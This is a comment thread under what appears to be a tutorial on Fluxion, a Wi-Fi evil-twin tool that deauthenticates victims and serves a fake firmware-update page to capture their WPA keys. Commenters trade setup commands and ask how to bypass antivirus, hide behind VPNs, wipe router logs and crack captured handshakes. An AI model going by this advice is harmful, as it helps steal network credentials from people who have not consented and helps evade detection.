My question is , Why I did not promt for firmware upgrade page?
Does external wireless adapter is necessary ?
I m stuck at four windows opened. Any idea ? Thanks in advance.

Hi, really nice guide !
I have just a question :My AV blocks the Fake Login Page, is there a way to bypass it ?
Thanks

I don't know how I would go about coding this, but might it be possible to set up the fake IP with its own encryption, just so that the network would appear to be locked -- to me this seems to be the biggest flaw in a fluxion attack.

Airgeddon allows this

What? why would you want that?

Fluxion:

The victim isn't even aware that he has been kicked from his own network and connected to the fake one (by his own system/device)

And once he starts browsing the net, he is greeted with a good router firmware update webpage asking for the WPA/2 key. My router actually does that often (but it asks for router login credentials ofc). I've had 49% success using this attack.

If we apply your strat, the victim's device wouldn't even try to connect to the hosted evil AP (cuz of encryption) and thus the device will just keep reconnecting to the 'original' network (due to the continuous de-auths).But IF the user gets disturbed due to the disconnections from WLAN, he might try to connect to the evil network manually and type/give-in the WPA.

Success probability: 20% IMO

Well, you're just doing a MITM attack at that point. If you want to attack an AP and you crack the password, you just create an encrypted evil AP that looks identical and deauth the legit one

Use a secondary adapter to launch the fake ap. With your normal connection, connect to a vpn that keeps no logs. Edit hostapd.conf and change adapter to wlan1. There your chances of being caught are slim

How the client connection with the true AP is terminated? Or it just works with new connections?

Also, how can the client connect to the false AP instead of the true AP, is it automatic or the user have to connect to the new AP manually?

I Have Some Handshake Capture Files. Could Anybody Crack Them for Me Please?

Hey guys, nice tool and tutorial.

I tried by myself and everything works ok, but there's an issue about HTTPS websites. I know that Fluxion generates an SSL for the attack, but as this certificate is not assigned, the webbrowser block the connection.

Does anyone knows how to bypass this?

I already tried to create a self-signed certificate with openssl, but, or i've done it wrong, or it doesn't work anyway LoL

Thank you all in advance!

ok so the issue is that most routers now use uppercase and lowercase as well as numbers for their password that people dont really change. but most wordlists like rockyou use common passcodes. are their any password txt that use these built in passwords for example Aug67Hgf78u. upper and lower

also. when using fluxion and test on my own router i dont get kicked from my network. it just shows another AP with a clone to mine but doesn't kick me and force to reconnect

bro i need to talk to you personaly could i get your fb id r number plz

When using my Wlan1 Interface to see the list of AP's, my Flux ion terminal cuts, and ends at WARNING LOCALE not supported by Xlib locale set to C.

Any help ?

I am running fluxion on a raspberry pi that I'm connecting to via VNC. I have two wireless adapters. wlan0 is connected to my router, and wlan1 is to be used for the attack. When prompted by the script to choose a network adapter, I choose wlan1, and the RaspberryPi immediatelly disconnects from my network even though I didn't choose the adapter with which I am connected to my router. Is there any way I can prevent this from hapenning? I opened the file and saw something mentioning preserve/keep network. I looked in the flags section of the wiki on github but did not see anything about that.

Hm, according to my knowledge, you're supposed to disable your network connections/network manager, in order for your wlan0/wlan1/wlanX to be able to function in Monitor Mode and also be able to inject/jam ...as it cannot snoop on airtraffick and also be connected to the internet at the same time - even if there are two different interfaces, all of them must be killed, unfortunately

so uh, after you verified that your Fluxion's version is up to date, you may proceed by either running the following commands :

airmon-ng check kill
service network-manager stop

you can run service network-manager restart or service network-manager start once you are finished with your wireless attacks/finished using Fluxion

I have this error

root@kali:~# cd fluxion

root@kali:~/fluxion# ls
docs fluxion.sh language locale README.md sites
fluxion install lib logos siteinstaller.py

root@kali:~/fluxion# sudo ./fluxion
sudo: ./fluxion: command not found

root@kali:~/fluxion#

thank you for helping

Yes, I too have this error, unfortunately, hmph - I think it must have been something with the legal trouble that the creator of this tool had to face...

Step 1: Clone the Most Recently Updated Git? O.0

so the repo provided by this guide "github.com/wi-fi-analyzer/fluxion" was altered and rendered useless... so you must instead another Git repo... in other words, use this command git clone github.com/FluxionNetwork/fluxion

Step 2: Continue the Procedure

After cloning the FluxionNetwork git repo, you should be able to see the fluxion folder when you run the following command: ls ... type cd fluxion into yar terminal - after that, type sudo ./fluxion.sh and your will see that Fluxion is being installed... as well as it's dependencies (after the installion is finished, you will be prompted with a language select screen and then it will ask whatever Wireless Attack you want for an Access Point

Step 3: Running the Fluxion After Installation

You'll have to navigate to your Fluxion folder (cd fluxion) and run sudo ./fluxion.sh every time you exit Fluxion or wish to start anew

Can someone help me in installing fluxion? I downloaded it as zip in my windows 10. Should i extract it her? How can i open in kali linux running in virtualbox?

If you have the option of deleting the Microsoft based Operating System, I'd suggest that - I've honestly never regretted uninstalling Windows 8.1/10 and switching over to Linux entirely ;)

Open source operating systems/software is certainly always better than closed source operating systems/proprietary nonsense.

If routers generate logs of the activities which lead to discovery that user was hacked, is there a way to wipe out the tracks or cover the tracks as not to lead to us? a good tutorial would be great. thansk!

I'm pretty sure that Null Byte is a white hat community and these guides are published so that people can pen test networks of their own (to see if one needs to beef up their security or maybe just for fun?!) and possibly other networks can be pen tested, but only if the owner(s) have given their valid consent to run such tests, of course.

hello. can I use the onboard WLAN card provided on my laptop?

Thank you very much.How to crack an AP whose wps is locked,and how to crack its password,8 digit,lowercase and digit?

Share Your Thoughts

  • Hot
  • Latest